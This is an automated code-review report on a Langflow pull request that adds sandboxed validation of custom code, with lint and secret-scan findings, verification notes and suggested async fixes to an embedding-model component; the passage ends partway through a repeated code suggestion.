  • uv.lock is excluded by !**/*.lock
📒 Files selected for processing (8)
  • src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (5 hunks)
  • src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
  • src/backend/tests/unit/utils/test_validate.py (1 hunks)
  • src/lfx/src/lfx/custom/sandbox.py (1 hunks)
  • src/lfx/src/lfx/custom/validate.py (2 hunks)
  • src/lfx/src/lfx/services/settings/base.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
  • create_isolated_import (142-176)
  • execute_in_sandbox (179-242)
  • isolated_import (152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py

[error] 139-139: F841 Local variable result is assigned to but never used.

🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py

[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used

src/lfx/src/lfx/custom/sandbox.py

[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class


[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class


[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)


[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class


[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass


[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
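The EM102, TRY003, and SIM105 findings above follow common patterns. The sketch below shows one way each is typically addressed; BlockedModuleError, check_builtin, and drop_attr are hypothetical names and do not come from sandbox.py.

```python
import contextlib


class BlockedModuleError(Exception):
    """Builds its own message, so call sites pass data instead of prose."""

    def __init__(self, module: str) -> None:
        self.module = module
        super().__init__(f"module '{module}' is blocked")


def check_builtin(name: str, blocked: set[str]) -> None:
    """Raise if name is blocked, assigning the message to a variable first."""
    if name in blocked:
        msg = f"builtin '{name}' is blocked"  # the pattern EM102 asks for
        raise ValueError(msg)


def drop_attr(obj: object, name: str) -> None:
    """Remove an attribute if present; suppress replaces try/except/pass."""
    with contextlib.suppress(AttributeError):
        delattr(obj, name)
```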

🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
  • GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
  • GitHub Check: Test Docker Images / Test docker images
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)

70-75: Clarify test coverage inconsistency and file path.

The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION available to override this behavior.

However, I cannot locate the specific file path src/backend/tests/unit/utils/test_validate.py in the sandbox-related test results. The script output shows comprehensive sandbox tests at src/lfx/tests/unit/custom/test_sandbox_security.py and src/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests at src/backend/tests/unit/api/v1/test_validate.py.

The tests at src/backend/tests/unit/api/v1/test_validate.py (lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still reference os/sys without apparent sandbox restrictions, they may be:

  1. Testing exception scenarios where blocking is expected
  2. Running under an environment with the override flag enabled
  3. Testing different code paths than the validate endpoint

Please confirm:

  • Is the file path src/backend/tests/unit/utils/test_validate.py correct, or has it been reorganized?
  • What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)

11-12: Sandbox integration in validate_code looks solid

Using create_isolated_import for both ast.Import and ast.ImportFrom and then running each FunctionDef through execute_in_sandbox with a constrained Langflow execution context gives you:

  • Blocked dangerous modules at import time (surfaced as structured import errors),
  • Definition‑time evaluation (decorators / default args) inside the sandbox, and
  • No leakage of server globals or real __builtins__ into user code.

The _create_langflow_execution_context fallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the /validate/code endpoint and looks correct.

Also applies to: 51-88, 93-150
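
The import-time blocking described in this comment can be sketched in a few lines. This is an illustration under stated assumptions, not the PR's code: `BLOCKED_MODULES`, `BLOCKED_BUILTINS`, `make_guarded_import`, `make_restricted_builtins` and `run_restricted` are hypothetical names, and the real `create_isolated_import` / `execute_in_sandbox` may differ in signature and behavior. As the PR description notes, this kind of restriction is not a true isolated sandbox.

```python
import builtins

# Hypothetical block lists for illustration; the PR's actual lists may differ.
BLOCKED_MODULES = frozenset({"os", "subprocess", "socket"})
BLOCKED_BUILTINS = frozenset({"eval", "exec", "compile", "open", "__import__"})


def make_guarded_import(blocked=BLOCKED_MODULES):
    """Return an __import__ replacement that rejects blocked top-level modules."""
    real_import = builtins.__import__

    def guarded_import(name, globals=None, locals=None, fromlist=(), level=0):
        if name.split(".")[0] in blocked:
            msg = f"import of '{name}' is blocked"
            raise ImportError(msg)
        return real_import(name, globals, locals, fromlist, level)

    return guarded_import


def make_restricted_builtins():
    """Copy the real builtins, drop blocked names, and install the guarded import."""
    safe = {k: v for k, v in vars(builtins).items() if k not in BLOCKED_BUILTINS}
    safe["__import__"] = make_guarded_import()
    return safe


def run_restricted(source: str) -> dict:
    """Execute source with restricted builtins and return its namespace."""
    namespace = {"__builtins__": make_restricted_builtins()}
    exec(compile(source, "<user-code>", "exec"), namespace)
    return namespace
```

Passing a fresh namespace with its own `__builtins__` is what keeps server globals and the real builtins out of the user code's direct reach; determined code can still reach blocked objects through introspection, which is why container-level isolation remains necessary.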

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)

2018-2019: All IBM SDK and LangChain‑IBM signatures verified as correct.

The web search confirms that your code correctly uses:

  • Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
  • EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
  • WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19

All parameters and signatures match the documented patterns for the versions pinned in your dependencies.


1859-1866: Dependency versions verified and consistent.

Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:

  • Properly pinned in the JSON starter project configuration
  • Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
  • Mutually compatible with no conflicts detected
  • Compatible with project's Python requirement (>=3.10,<3.14)

Comment on lines 2018 to 2019
"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). 
Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == 
\"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = 
False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n 
build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
},

🛠️ Refactor suggestion | 🟠 Major

Avoid blocking calls and duplicate fetches when listing IBM models.

fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.

Apply this minimal change inside the EmbeddingModelComponent code block:

+import asyncio
@@
-            elif field_value == "IBM watsonx.ai":
-                build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
-                build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+            elif field_value == "IBM watsonx.ai":
+                models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+                build_config["model"]["options"] = models
+                build_config["model"]["value"] = (models[0] if models else "")
@@
-        elif field_name == "base_url_ibm_watsonx":
-            build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
-            build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+        elif field_name == "base_url_ibm_watsonx":
+            models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+            build_config["model"]["options"] = models
+            build_config["model"]["value"] = (models[0] if models else "")

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.
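
The pattern suggested above (offload the blocking call, fetch once, guard against an empty list) can be tried in isolation. A minimal sketch, assuming a hypothetical stand-in `fetch_models_blocking` that sleeps instead of calling the watsonx.ai API and a hypothetical `update_model_field` coroutine; only `asyncio.to_thread` and the `build_config` key layout are taken from the review comment:

```python
import asyncio
import time


def fetch_models_blocking(base_url: str) -> list[str]:
    """Stand-in for a synchronous HTTP call; sleeps instead of hitting the network."""
    time.sleep(0.05)
    return sorted([f"{base_url}/model-b", f"{base_url}/model-a"])


async def update_model_field(build_config: dict, base_url: str) -> dict:
    # Run the blocking call in a worker thread so the event loop stays responsive,
    # and reuse the single result for both fields.
    models = await asyncio.to_thread(fetch_models_blocking, base_url)
    build_config["model"]["options"] = models
    build_config["model"]["value"] = models[0] if models else ""
    return build_config


config = asyncio.run(update_model_field({"model": {}}, "https://example.invalid"))
```

The `models[0] if models else ""` guard matters independently of the threading change: indexing the result directly raises `IndexError` whenever the fetch returns an empty list.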

⚠️ Potential issue | 🟠 Major

Fix: use the updated value in Ollama base URL refresh.

The ollama_base_url handler ignores field_value, risking stale model lists.

Apply:

-        elif field_name == "ollama_base_url":
+        elif field_name == "ollama_base_url":
@@
-            ollama_url = self.ollama_base_url
+            ollama_url = field_value or self.ollama_base_url
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). 
Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == 
\"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
